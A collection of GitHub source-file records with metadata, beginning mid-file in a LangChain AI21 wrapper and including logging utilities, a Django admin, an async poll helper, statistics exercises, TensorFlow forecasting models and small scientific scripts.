self.model in (\"j1-grande-instruct\",):\n base_url = \"https://api.ai21.com/studio/v1/experimental\"\n else:\n base_url = \"https://api.ai21.com/studio/v1\"\n params = {**self._default_params, **kwargs}\n self.ai21_api_key = cast(SecretStr, self.ai21_api_key)\n response = requests.post(\n url=f\"{base_url}/{self.model}/complete\",\n headers={\"Authorization\": f\"Bearer {self.ai21_api_key.get_secret_value()}\"},\n json={\"prompt\": prompt, \"stopSequences\": stop, **params},\n )\n if response.status_code != 200:\n optional_detail = response.json().get(\"error\")\n raise ValueError(\n f\"AI21 /complete call failed with status code {response.status_code}.\"\n f\" Details: {optional_detail}\"\n )\n response_json = response.json()\n return response_json[\"completions\"][0][\"data\"][\"text\"]\n","repo_name":"langchain-ai/langchain","sub_path":"libs/community/langchain_community/llms/ai21.py","file_name":"ai21.py","file_ext":"py","file_size_in_byte":5292,"program_lang":"python","lang":"en","doc_type":"code","stars":68990,"dataset":"github-code","pt":"7"}
+{"seq_id":"6666604706","text":"# -*- coding:utf-8 -*-\r\n\"\"\" Provide log related functions. You need to Initialize the logger and use the logger to make logs.\r\n\r\nExample:\r\n\r\n>>> logger = Initialize()\r\n\r\nUse logger.level(\\*msg) to log like:\r\n\r\n>>> logger.error(\"Pickle data writing Failed.\")\r\n\r\n>>> logger.info(\"Pickle data of \", foo, \" written successfully.\")\r\n\r\nThe log will be stored into LogFile.log by default.\r\n\"\"\"\r\n\r\n__author__ = \"Wang Hewen\"\r\n\r\nimport sys\r\nimport logging\r\n\r\nlogging.currentframe = lambda: sys._getframe(5)\r\nclass Logger(logging.Logger):\r\n def debug(self, *args, **kwargs):\r\n super().log(\"\".join([str(arg) for arg in args]), **kwargs)\r\n\r\n def info(self, *args, **kwargs):\r\n super().info(\"\".join([str(arg) for arg in args]), **kwargs)\r\n\r\n def warning(self, *args, **kwargs):\r\n super().warning(\"\".join([str(arg) for arg in args]), **kwargs)\r\n\r\n def warn(self, *args, **kwargs):\r\n super().warn(\"\".join([str(arg) for arg in args]), **kwargs)\r\n\r\n def error(self, *args, **kwargs):\r\n super().error(\"\".join([str(arg) for arg in args]), **kwargs)\r\n\r\n def exception(self, *args, exc_info=True, **kwargs):\r\n super().exception(\"\".join([str(arg) for arg in args]), exc_info = exc_info, **kwargs)\r\n\r\n def critical(self, *args, **kwargs):\r\n super().critical(\"\".join([str(arg) for arg in args]), **kwargs)\r\n\r\n def log(self, level, *args, **kwargs):\r\n super().log(level, \"\".join([str(arg) for arg in args]), **kwargs)\r\n\r\n def _log(self, level, msg, args, exc_info=None, extra=None, stack_info=False):\r\n super()._log(level, msg, args, exc_info=None, extra=None, stack_info=False)\r\n\r\n\r\ndef Initialize(FileName = \"LogFile.log\", LogLevel = \"INFO\", WriteToStream = False):\r\n '''\r\nInitialize loggers for logging. A logger will be returned.\r\n\r\n:param String FileName: Path of the log file\r\n:param String LogLevel: LogLevel of the logger, which can be \"DEBUG\", \"INFO\", \"ERROR\"\r\n:param Boolean WriteToStream: Whether to write to stdout\r\n:return: logger: The logger used for logging\r\n:rtype: logging.loggger\r\n '''\r\n if LogLevel not in [\"DEBUG\", \"INFO\", \"ERROR\"]:\r\n raise ValueError(\"LogLevel is not correctly set.\")\r\n logging.Logger.manager.setLoggerClass(Logger)\r\n logger = logging.getLogger(__name__) #__name__ == CommonModules.Log\r\n handlers = logger.handlers[:]\r\n for handler in handlers:\r\n handler.close()\r\n logger.removeHandler(handler)\r\n fileHandler = logging.FileHandler(FileName)\r\n fileHandler.setFormatter(logging.Formatter('%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s: %(message)s', datefmt = '%Y/%m/%d %H:%M:%S'))\r\n if LogLevel == \"DEBUG\":\r\n streamHandler = logging.StreamHandler(stream = sys.stdout)\r\n streamHandler.setLevel(logging.DEBUG)\r\n fileHandler.setLevel(logging.DEBUG)\r\n logger.setLevel(logging.DEBUG)\r\n if LogLevel == \"INFO\":\r\n streamHandler = logging.StreamHandler(stream = sys.stdout)\r\n streamHandler.setLevel(logging.INFO)\r\n fileHandler.setLevel(logging.INFO)\r\n logger.setLevel(logging.INFO)\r\n if LogLevel == \"ERROR\":\r\n streamHandler = logging.StreamHandler(stream = sys.stderr)\r\n streamHandler.setLevel(logging.ERROR)\r\n fileHandler.setLevel(logging.ERROR)\r\n logger.setLevel(logging.ERROR)\r\n\r\n streamHandler.setFormatter(logging.Formatter('%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s: %(message)s', datefmt = '%Y/%m/%d %H:%M:%S'))\r\n if WriteToStream:\r\n logger.addHandler(streamHandler) \r\n logger.addHandler(fileHandler)\r\n return logger\r\n","repo_name":"wanghewen/CommonModules","sub_path":"CommonModules/Log.py","file_name":"Log.py","file_ext":"py","file_size_in_byte":3611,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"7"}
+{"seq_id":"14840831355","text":"import numpy as np\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.feature_selection import RFE\n\n\ndef rfe(X: np.array, y: np.array, n_features_to_select: int = 3):\n \"\"\"\n Performs recursive feature elimination\n\n Args:\n - X: Input numpy array (train_data)\n - y: Input numpy array (train_data labels)\n - n_features_to_select: number of features to keep\n\n Returns:\n - X_transformed: Output numpy array (with columns filtered)\n - y: numpy array (train_data labels)\n - rfe: fitted RFE object\n \"\"\"\n model = LinearRegression()\n rfe = RFE(\n estimator=model,\n n_features_to_select=n_features_to_select\n )\n\n rfe.fit(X, y)\n X_transformed = rfe.transform(X)\n return X_transformed, y, rfe","repo_name":"alanchn31/ML-ToolBox","sub_path":"supervised/feature_selection/rfe.py","file_name":"rfe.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"6540510959","text":"from django.contrib import admin\nfrom .models import factura, codigoFinanciero\nfrom import_export.admin import ImportExportModelAdmin\n\n\nadmin.site.site_header = \"Gestion Pilar\"\nadmin.site.site_title = \"Gestion Pilar\"\n\n\n\n\n\n@admin.register(codigoFinanciero)\nclass codigoFinancieroAdmin(ImportExportModelAdmin):\n list_display= ('codigo',)\n\n@admin.register(factura)\nclass facturaAdmin(ImportExportModelAdmin):\n list_display=('emision', 'nroFactura', 'proveedor', 'total', 'objeto')\n\n\n def get_queryset(self, request):\n\n # Obtener el usuario actualmente autenticado\n user = request.user\n\n # Obtener el nombre del grupo al que pertenece el usuario\n user_group_name = user.groups.first().name if user.groups.exists() else None\n\n # Inicializar el queryset con todas las facturas\n queryset = super().get_queryset(request)\n\n # Filtrar las facturas por el nombre del grupo del usuario\n if user_group_name:\n queryset = queryset.filter(codigo__codigo=user_group_name)\n\n return queryset\n","repo_name":"Excel-ente/facturas","sub_path":"facturas/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"70078597985","text":"# -*- coding: utf-8 -*-\nimport errno\n\nfrom .poll import POLL_READ, POLL_WRITE, POLL_ERROR, POLL_DISCONNECT\nfrom .error import BrokenPipeError, ConnectionError\nfrom ..future import FutureSourcePair, FutureCanceled, RaisedFuture, CompletedFuture\n\n__all__ = ('PollAwaiter',)\n#------------------------------------------------------------------------------#\n# Poll Awaiter #\n#------------------------------------------------------------------------------#\nclass PollAwaiter (object):\n \"\"\"File await object\n \"\"\"\n __slots__ = ('fd', 'poller', 'mask', 'entries',)\n\n def __init__ (self, fd, poller):\n self.fd = fd\n self.poller = poller\n\n # state\n self.mask = 0\n self.entries = []\n\n #--------------------------------------------------------------------------#\n # Await #\n #--------------------------------------------------------------------------#\n def Await (self, mask, cancel = None):\n \"\"\"Await event specified by mask argument\n \"\"\"\n if mask is None:\n self.Dispose (BrokenPipeError (errno.EPIPE, 'Detached from core'))\n return CompletedFuture (None)\n elif not mask:\n return RaisedFuture (ValueError ('Empty event mask'))\n elif mask & self.mask:\n return RaisedFuture (ValueError ('Intersecting event mask: {}'.format (self)))\n\n # source\n future, source = FutureSourcePair ()\n if cancel:\n def cancel_cont (result, error):\n self.dispatch (mask)\n source.TrySetCanceled ()\n cancel.Await ().OnCompleted (cancel_cont)\n\n # register\n if self.mask:\n self.poller.Modify (self.fd, self.mask | mask)\n else:\n self.poller.Register (self.fd, mask)\n\n # update state\n self.mask |= mask\n self.entries.append ((mask, source))\n\n return future\n\n #--------------------------------------------------------------------------#\n # Resolve #\n #--------------------------------------------------------------------------#\n def Resolve (self, event):\n \"\"\"Resolve pending events effected by specified event mask\n \"\"\"\n if event & ~POLL_ERROR:\n for source in self.dispatch (event):\n source.TrySetResult (event)\n\n else:\n error = BrokenPipeError (errno.EPIPE, 'Broken pipe') if event & POLL_DISCONNECT else \\\n ConnectionError ()\n for source in self.dispatch (self.mask):\n source.TrySetException (error)\n\n #--------------------------------------------------------------------------#\n # Private #\n #--------------------------------------------------------------------------#\n def dispatch (self, event):\n \"\"\"Dispatch sources effected by specified event mask\n \"\"\"\n entries, effected = [], []\n\n # find effected\n for mask, source in self.entries:\n if mask & event:\n effected.append (source)\n else:\n entries.append ((mask, source))\n\n # update state\n self.mask &= ~event\n self.entries = entries\n\n if self.mask:\n self.poller.Modify (self.fd, self.mask)\n else:\n self.poller.Unregister (self.fd)\n\n return effected\n\n def __str__ (self):\n \"\"\"String representation\n \"\"\"\n events = []\n self.mask & POLL_READ and events.append ('read')\n self.mask & POLL_WRITE and events.append ('write')\n self.mask & POLL_ERROR and events.append ('error')\n return ''.format (self.fd, ','.join (events), id (self))\n __repr__ = __str__\n\n #--------------------------------------------------------------------------#\n # Disposable #\n #--------------------------------------------------------------------------#\n def Dispose (self, error = None):\n \"\"\"Dispose file and resolve all pending events with specified error\n \"\"\"\n error = error or FutureCanceled ('File await object has been disposed')\n\n for source in self.dispatch (self.mask):\n source.TrySetException (error)\n\n def __enter__ (self):\n return self\n\n def __exit__ (self, et, eo, tb):\n self.Dispose ()\n return False\n\n# vim: nu ft=python columns=120 :\n","repo_name":"aslpavel/async","sub_path":"core/poll_await.py","file_name":"poll_await.py","file_ext":"py","file_size_in_byte":4690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"14527919740","text":"class Solution:\n def removeElement(self, nums: List[int], val: int) -> int:\n \"\"\"\n Given a list of integers and an integer, remove any\n list entries which are equal to that integer in-place\n and return the number of remaining entries as an int.\n \"\"\"\n\n index = 0 \n while index < len(nums):\n # if same as value, remove\n if nums[index] == val:\n nums.pop(index)\n # if different, move onto next\n else:\n index += 1\n \n return index","repo_name":"Foggalong/leetcode","sub_path":"problems/remove_element/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"37153552840","text":"# 다음 데이터는 동일한 상품의 포장지 색상에 따른 매출액에 대한 자료이다.\n# 포장지 색상에 따른 제품의 매출액에 차이가 존재하는지 two-sample t-검정을 하시오.\n'''\nimport numpy as np\nimport scipy.stats as stats\n\nblue = [70, 68, 82, 78, 72, 68, 67, 68, 88, 60, 80]\nred = [60, 65, 55, 58, 67, 59, 61, 68, 77, 66, 66]\n\n# 귀무: 포장지 색상에 따른 제품의 매출액에 차이가 없다.\n# 대립: 포장지 색상에 따른 제품의 매출액에 차이가 있다.\n\nprint(np.mean(blue)) # 72.8\nprint(np.mean(red)) # 63.8\n\ntwo_sample = stats.ttest_ind(blue, red)\nprint(two_sample)\n# Ttest_indResult(statistic=2.9280203225212174, pvalue=0.008316545714784403)\n# pvalue=0.008316 < 0.05 이므로 귀무가설 기각!\n# 포장지 색상에 따른 제품의 매출액에 차이가 있다.\n'''\n\n# 남아 신생아 몸무게의 평균 검정을 수행하려고 한다.\n# 파일명 : babyboom.csv (testdata 폴더에 있음) # 1:여아, 2:남아 \n\n# 남아 신생아의 몸무게는 평균이 3000(g)으로 알려져 왔으나 이것이 틀렸다는 주장이 나왔다.\n# 표본으로 남아를 뽑아 체중을 측정하였다고 할 때 새로운 주장이 맞는지 검정하시오.\n\n# 귀무 : 남아 신생아의 몸무게는 평균이 3000(g) 이다.\n# 대립 : 남아 신생아의 몸무게는 평균이 3000(g)이 아니다.\n\"\"\"\nimport numpy as np\nimport scipy.stats as stats\nimport pandas as pd\n\ndata = pd.read_csv('../testdata/babyboom.csv')\nprint(data.head(3),len(data)) # 44\nprint(data.isnull().sum()) # 결측치 0 개\nbdata = data[data['gender'] == 2]\nprint(bdata.head(3), len(bdata)) # 남아의 수는 26\nprint(np.mean(bdata.weight)) # 3375.30\n\nprint(stats.shapiro(bdata.weight)) # pvalue=0.2022 정규성 만족 \n\nprint(stats.ttest_1samp(bdata.weight, popmean= 3000))\n# Ttest_1sampResult(statistic=4.47078356044109, pvalue=0.00014690296107439875)\n# pvalue=0.0001469 < 0.05 이므로 귀무가설 기각\n\"\"\"\n\n# 에이콘 주식회사에서 영업사원들의 '지각횟수'와 '판매횟수' 간에 관계가 있는지 알아보려고 한다.\n# 영업사원 5명을 대상으로 한 달 동안 '지각횟수'와 '판매횟수'를 조사했더니 아래와 같은 결과를 얻었다.\n# 둘 사이의 상관계수를 출력하고 상관관계가 있는지 설명하시오.\n\"\"\"\nimport pandas as pd\nimport numpy as np\n\n# 지각횟수(x) = 1,2,3,4,5\n# 판매횟수(y) = 8,7,6,4,5\n\ndf = pd.DataFrame({'late':(1,2,3,4,5),'sale':(8,7,6,4,5)})\nprint(df.corr(method='pearson'))\nprint(np.corrcoef(df.late, df.sale))\n\"\"\"\n\n# 소득 수준에 따른 외식 성향을 나타내고 있다. 주말 저녁에 외식을 하면 1, 외식을 하지 않으면 0으로 처리되었다.\n# 'eat_out.txt' 데이터에 대하여 소득 수준이 외식에 영향을 미치는지 로지스틱 회귀분석을 실시한다.\n# ① 소스 코드와 모델의 분류정확도를 출력하시오.\n# ② 키보드로 소득 수준(양의 정수)을 입력하면 외식 여부 분류 결과 출력하시오.\n\n# 조건1 : 모델 생성은 glm 함수를 사용하도록 한다.\n# 조건2 : 키보드로 입력할 소득 수준 값은 45로 한다.\n\nimport pandas as pd\nimport statsmodels.api as sm\nimport statsmodels.formula.api as smf\nimport numpy as np\nfrom sklearn.metrics import accuracy_score\n\ndata = pd.read_csv('../testdata/last_test.csv')\nprint(data)\neatout = data[(data.요일 == '토')| (data.요일 == '일')]\nprint(eatout)\n\nformula = '외식유무 ~ 소득수준'\nresult = smf.glm(formula = formula, data = eatout, family = sm.families.Binomial()).fit() # binomial 을 넣기 때문에 이항분포가 된다\nprint(result)\nprint(result.summary())\n\npred = result.predict(eatout)\nprint('정확도: ', accuracy_score(eatout['외식유무'], np.around(pred)))\n\nkey = int(input('소득 수준 입력 : 45를 눌러주세요...'))\nnewdf = pd.DataFrame({'소득수준':[key]})\npred2 = result.predict(newdf)\nprint(np.rint(pred2.values))\n","repo_name":"tyler-0331/python","sub_path":"pypro3/anal5/11.py","file_name":"11.py","file_ext":"py","file_size_in_byte":3981,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"368841172","text":"import logging\nimport sys\nimport warnings\nimport numpy as np\n\nglobal logger\nlogger = logging.getLogger('simnibs')\nsh = logging.StreamHandler()\nformatter = logging.Formatter('[ %(name)s ]%(levelname)s: %(message)s')\nsh.setFormatter(formatter)\nsh.setLevel(logging.INFO)\nlogger.addHandler(sh)\nlogger.setLevel(logging.DEBUG)\nlogging.addLevelName(25, 'SUMMARY')\n\n\ndef log_warnings(message, category, filename, lineno, file=None, line=None):\n logger.warn(warnings.formatwarning(message, category, filename, lineno))\n\n\n# This is causing errors in pytest\n#warnings.showwarning = log_warnings\n\n\ndef register_excepthook(logger):\n def log_excep(exc_type, exc_value, exc_traceback):\n if issubclass(exc_type, KeyboardInterrupt):\n sys.__excepthook__(exc_type, exc_value, exc_traceback)\n return\n logger.debug(\n \"Traceback\",\n exc_info=(exc_type, exc_value, exc_traceback)\n )\n logger.critical(\n \"Uncaught exception\",\n exc_info=(exc_type, exc_value, None)\n )\n sys.excepthook = log_excep\n\n\ndef unregister_excepthook():\n sys.excepthook = sys.__excepthook__\n\n\ndef format_time(running_time):\n \"\"\"Format time in seconds as hours:minutes:seconds.\n \n PARAMETERS\n ----------\n running_time : float\n Time in seconds.\n \n RETURNS\n ----------\n running_time : str\n The time formatted as hours:minutes:seconds.\n \"\"\"\n hrs = np.uint16(np.floor(running_time/(60.**2)))\n mts = np.uint16(np.floor(running_time/60.-hrs*60))\n sec = np.uint16(np.round(running_time-hrs*60.**2-mts*60.))\n\n return \"{:02d}:{:02d}:{:02d}\".format(hrs,mts,sec)","repo_name":"simnibs/simnibs","sub_path":"simnibs/utils/simnibs_logger.py","file_name":"simnibs_logger.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","stars":87,"dataset":"github-code","pt":"7"}
+{"seq_id":"31785380706","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport tensorflow as tf\nfrom dataset import WindowGenerator\n\n\nclass Baseline(tf.keras.Model):\n def __init__(self, label_index=None):\n super().__init__()\n self.label_index = label_index\n\n def call(self, inputs):\n if self.label_index is None:\n return inputs\n result = inputs[:, :, self.label_index]\n return result[:, :, tf.newaxis]\n\n\nclass MultiStepLastBaseline(tf.keras.Model):\n def call(self, inputs):\n return tf.tile(inputs[:, -1:, :], [1, OUT_STEPS, 1])\n\n\nclass RepeatBaseline(tf.keras.Model):\n def call(self, inputs):\n return inputs\n\n\nclass ResidualWrapper(tf.keras.Model):\n def __init__(self, model):\n super().__init__()\n self.model = model\n\n def call(self, inputs, *args, **kwargs):\n delta = self.model(inputs, *args, **kwargs)\n # The prediction for each timestep is the input\n # from the previous time step plus the delta\n # calculated by the model.\n return inputs + delta\n\n\nclass FeedBack(tf.keras.Model):\n def __init__(self, units, out_steps):\n super().__init__()\n self.out_steps = out_steps\n self.units = units\n self.lstm_cell = tf.keras.layers.LSTMCell(units)\n # Also wrap the LSTMCell in an RNN to simplify the `warmup` method.\n self.lstm_rnn = tf.keras.layers.RNN(self.lstm_cell, return_state=True)\n self.dense = tf.keras.layers.Dense(num_features)\n\n def warmup(self, inputs):\n # inputs.shape => (batch, time, features)\n # x.shape => (batch, lstm_units)\n x, *state = self.lstm_rnn(inputs)\n # predictions.shape => (batch, features)\n prediction = self.dense(x)\n return prediction, state\n\n def call(self, inputs, training=None):\n # Use a TensorArray to capture dynamically unrolled outputs.\n predictions = []\n # Initialize the lstm state\n prediction, state = self.warmup(inputs)\n # Insert the first prediction\n predictions.append(prediction)\n\n # Run the rest of the prediction steps\n for n in range(1, self.out_steps):\n # Use the last prediction as input.\n x = prediction\n # Execute one lstm step.\n x, state = self.lstm_cell(x, states=state, training=training)\n # Convert the lstm output to a prediction.\n prediction = self.dense(x)\n # Add the prediction to the output\n predictions.append(prediction)\n\n # predictions.shape => (time, batch, features)\n predictions = tf.stack(predictions)\n # predictions.shape => (batch, time, features)\n predictions = tf.transpose(predictions, [1, 0, 2])\n return predictions\n\n\ndef compile_and_fit(model, window, patience=8):\n early_stopping = tf.keras.callbacks.EarlyStopping(monitor='val_loss',\n patience=patience,\n mode='min')\n model.compile(loss=tf.losses.MeanSquaredError(),\n optimizer=tf.optimizers.Adam(),\n metrics=[tf.metrics.MeanAbsoluteError()])\n history = model.fit(window.train, epochs=MAX_EPOCHS,\n validation_data=window.val,\n callbacks=[early_stopping])\n model.save(filepath='tmp/model/')\n return history\n\n\ndef plot_experiments(metric_idx, val_loss, train_loss, train_accs, val_accs, test_accs):\n x = np.arange(len(train_loss))\n val_mae = [v[metric_idx] for v in val_loss.values()]\n test_mae = [v[metric_idx] for v in train_loss.values()]\n\n plt.ylabel('mean_absolute_error [DIJA, normalized]')\n plt.bar(x - 0.17, val_mae, 0.3, label='Validation')\n plt.bar(x + 0.17, test_mae, 0.3, label='Test')\n plt.xticks(ticks=x, labels=train_loss.keys(), rotation=45)\n _ = plt.legend()\n plt.show()\n\n train_acc = [v for v in train_accs.values()]\n val_acc = [v for v in val_accs.values()]\n test_acc = [v for v in test_accs.values()]\n plt.ylabel('binary accuracy')\n plt.bar(x - 0.23, train_acc, 0.2, label='Train')\n plt.bar(x, val_acc, 0.2, label='Validation')\n plt.bar(x + 0.23, test_acc, 0.2, label='Test')\n plt.xticks(ticks=x, labels=train_loss.keys(), rotation=45)\n _ = plt.legend()\n plt.show()\n\n\ndef train_and_evaluate(model, window, plot_window, name):\n if name == 'Baseline' or name == 'Last' or name == 'Repeat':\n model.compile(loss=tf.losses.MeanSquaredError(), metrics=[tf.metrics.MeanAbsoluteError()])\n else:\n compile_and_fit(model=model, window=window)\n val_performance[name] = model.evaluate(window.val)\n performance[name] = model.evaluate(window.test, verbose=0)\n train_acc[name] = window.binary_accuracy(model=model, ds='train')\n val_acc[name] = window.binary_accuracy(model=model, ds='val')\n test_acc[name] = window.binary_accuracy(model=model, ds='test')\n plot_window.plot(name=name, model=model, acc=test_acc[name])\n\n\ndef run_single_step_models():\n baseline = Baseline(label_index=0)\n train_and_evaluate(baseline, single_step_window, wide_window, 'Baseline')\n\n linear = tf.keras.Sequential([tf.keras.layers.Dense(units=1)])\n train_and_evaluate(linear, single_step_window, wide_window, 'Linear')\n\n\n # dense = tf.keras.Sequential([\n # tf.keras.layers.Dense(units=64, activation='relu'),\n # tf.keras.layers.Dense(units=1)\n # ])\n # train_and_evaluate(dense, single_step_window, wide_window, 'Dense')\n\n # multi_step_dense = tf.keras.Sequential([\n # # Shape: (time, features) => (time*features)\n # tf.keras.layers.Flatten(),\n # tf.keras.layers.Dense(units=32, activation='relu'),\n # tf.keras.layers.Dense(units=1),\n # # Add back the time dimension.\n # # Shape: (outputs) => (1, outputs)\n # tf.keras.layers.Reshape([1, -1]),\n # ])\n # train_and_evaluate(multi_step_dense, conv_window, conv_window, 'Multi-step dense')\n #\n # conv_model = tf.keras.Sequential([\n # tf.keras.layers.Conv1D(filters=16,\n # kernel_size=(CONV_WIDTH,),\n # activation='relu'),\n # tf.keras.layers.Dense(units=16, activation='relu'),\n # tf.keras.layers.Dense(units=1),\n # ])\n # train_and_evaluate(conv_model, conv_window, wide_conv_window, 'Conv')\n #\n # lstm_model = tf.keras.models.Sequential([\n # # Shape [batch, time, features] => [batch, time, lstm_units]\n # tf.keras.layers.LSTM(32, return_sequences=True),\n # # Shape => [batch, time, features]\n # tf.keras.layers.Dense(units=1)\n # ])\n # train_and_evaluate(lstm_model, wide_window, wide_window, 'LSTM')\n\n metric_idx = baseline.metrics_names.index('mean_absolute_error')\n return metric_idx\n\n\ndef run_multi_output_models():\n baseline = Baseline(label_index=0)\n train_and_evaluate(baseline, single_step_window, wide_window, 'Baseline Multi-out')\n\n dense = tf.keras.Sequential([\n tf.keras.layers.Dense(units=64, activation='relu'),\n tf.keras.layers.Dense(units=64, activation='relu'),\n tf.keras.layers.Dense(units=num_features)\n ])\n train_and_evaluate(dense, single_step_window, wide_window, 'Dense Multi-out')\n\n lstm_model = tf.keras.models.Sequential([\n # Shape [batch, time, features] => [batch, time, lstm_units]\n tf.keras.layers.LSTM(32, return_sequences=True),\n # Shape => [batch, time, features]\n tf.keras.layers.Dense(units=num_features)\n ])\n train_and_evaluate(lstm_model, wide_window_multi_out, wide_window, 'LSTM Multi-out')\n\n residual_lstm = ResidualWrapper(\n tf.keras.Sequential([\n tf.keras.layers.LSTM(32, return_sequences=True),\n tf.keras.layers.Dense(\n num_features,\n # The predicted deltas should start small\n # So initialize the output layer with zeros\n kernel_initializer=tf.initializers.zeros())\n ]))\n train_and_evaluate(residual_lstm, wide_window_multi_out, wide_window, 'Residual LSTM Multi-out')\n\n metric_idx = baseline.metrics_names.index('mean_absolute_error')\n return metric_idx\n\n\ndef run_multi_step_models():\n last_baseline = MultiStepLastBaseline()\n train_and_evaluate(last_baseline, multi_window, multi_window, 'Last')\n\n repeat_baseline = RepeatBaseline()\n train_and_evaluate(repeat_baseline, multi_window, multi_window, 'Repeat')\n\n multi_linear_model = tf.keras.Sequential([\n # Take the last time-step.\n # Shape [batch, time, features] => [batch, 1, features]\n tf.keras.layers.Lambda(lambda x: x[:, -1:, :]),\n # Shape => [batch, 1, out_steps*features]\n tf.keras.layers.Dense(OUT_STEPS * num_features, kernel_initializer=tf.initializers.zeros()),\n # Shape => [batch, out_steps, features]\n tf.keras.layers.Reshape([OUT_STEPS, num_features])\n ])\n train_and_evaluate(multi_linear_model, multi_window, multi_window, 'Linear Multi')\n\n # multi_dense_model = tf.keras.Sequential([\n # # Take the last time step.\n # # Shape [batch, time, features] => [batch, 1, features]\n # tf.keras.layers.Lambda(lambda x: x[:, -1:, :]),\n # # Shape => [batch, 1, dense_units]\n # tf.keras.layers.Dense(512, activation='relu'),\n # # Shape => [batch, out_steps*features]\n # tf.keras.layers.Dense(OUT_STEPS * num_features, kernel_initializer=tf.initializers.zeros()),\n # # Shape => [batch, out_steps, features]\n # tf.keras.layers.Reshape([OUT_STEPS, num_features])\n # ])\n # train_and_evaluate(multi_dense_model, multi_window, multi_window, 'Dense Multi')\n #\n # multi_conv_model = tf.keras.Sequential([\n # # Shape [batch, time, features] => [batch, CONV_WIDTH, features]\n # tf.keras.layers.Lambda(lambda x: x[:, -CONV_WIDTH:, :]),\n # # Shape => [batch, 1, conv_units]\n # tf.keras.layers.Conv1D(1024, activation='relu', kernel_size=CONV_WIDTH),\n # # Shape => [batch, 1, out_steps*features]\n # tf.keras.layers.Dense(OUT_STEPS * num_features, kernel_initializer=tf.initializers.zeros()),\n # # Shape => [batch, out_steps, features]\n # tf.keras.layers.Reshape([OUT_STEPS, num_features])\n # ])\n # train_and_evaluate(multi_conv_model, multi_window, multi_window, 'Conv Multi')\n #\n # multi_lstm_model = tf.keras.Sequential([\n # # Shape [batch, time, features] => [batch, lstm_units]\n # # Adding more `lstm_units` just overfits more quickly.\n # tf.keras.layers.LSTM(32, return_sequences=False),\n # # Shape => [batch, out_steps*features]\n # tf.keras.layers.Dense(OUT_STEPS * num_features, kernel_initializer=tf.initializers.zeros()),\n # # Shape => [batch, out_steps, features]\n # tf.keras.layers.Reshape([OUT_STEPS, num_features])\n # ])\n # train_and_evaluate(multi_lstm_model, multi_window, multi_window, 'LSTM Multi')\n #\n # feedback_model = FeedBack(units=32, out_steps=OUT_STEPS)\n # train_and_evaluate(feedback_model, multi_window, multi_window, 'AR LSTM')\n\n metric_idx = repeat_baseline.metrics_names.index('mean_absolute_error')\n return metric_idx\n\n\nif __name__ == \"__main__\":\n val_performance, performance, train_acc, val_acc, test_acc = {}, {}, {}, {}, {}\n num_features = 118\n MAX_EPOCHS = 200\n CONV_WIDTH = 5\n LABEL_WIDTH = 24\n INPUT_WIDTH = LABEL_WIDTH + (CONV_WIDTH - 1)\n OUT_STEPS = 24\n single_step_window = WindowGenerator(\n input_width=1, label_width=1, shift=1, label_columns=['DIJA'])\n wide_window = WindowGenerator(\n input_width=24, label_width=24, shift=1, label_columns=['DIJA'])\n wide_window_multi_out = WindowGenerator(\n input_width=24, label_width=24, shift=1)\n conv_window = WindowGenerator(\n input_width=CONV_WIDTH, label_width=1, shift=1, label_columns=['DIJA'])\n wide_conv_window = WindowGenerator(\n input_width=INPUT_WIDTH, label_width=LABEL_WIDTH, shift=1, label_columns=['DIJA'])\n multi_window = WindowGenerator(\n input_width=24, label_width=OUT_STEPS, shift=OUT_STEPS)\n\n metric_index = run_single_step_models()\n # _ = run_multi_output_models()\n # _ = run_multi_step_models()\n plot_experiments(metric_index, val_performance, performance, train_acc, val_acc, test_acc)\n","repo_name":"ricky-ma/NLPStonks","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":12401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"31680989939","text":"from lcapy import s, sympify, j, sqrt\n\nzeta = sympify('zeta_', real=True)\nomega0 = sympify('omega0', real=True)\n\np1a = -zeta * omega0 + j * omega0 * sqrt(1 - zeta**2)\np1b = -zeta * omega0 - j * omega0 * sqrt(1 - zeta**2)\n\nalpha1 = sympify('alpha_1', real=True)\nomega1 = sympify('omega_1', real=True)\n\np1a = -alpha1 + j * omega1\np1b = -alpha1 - j * omega1\n\nH = p1a * p1b / ((s - p1a) * (s - p1b))\n\nG = H / s\n\ng = G.partfrac().inverse_laplace(causal=True)\nh = H.partfrac().inverse_laplace(causal=True)\n\ndef topy(expr):\n\n s = str(expr)\n s = s.replace('**', '^').replace('_', '').replace('*', ' * ').replace('^', '**').replace('Heaviside(t)', '(t >= 0)').replace('/', ' / ') \n return s\n\nprint(topy(g))\n\nprint(topy(h))\n","repo_name":"mph-/dsp-notebooks","sub_path":"intro/responses/pzlp2ud.py","file_name":"pzlp2ud.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"}
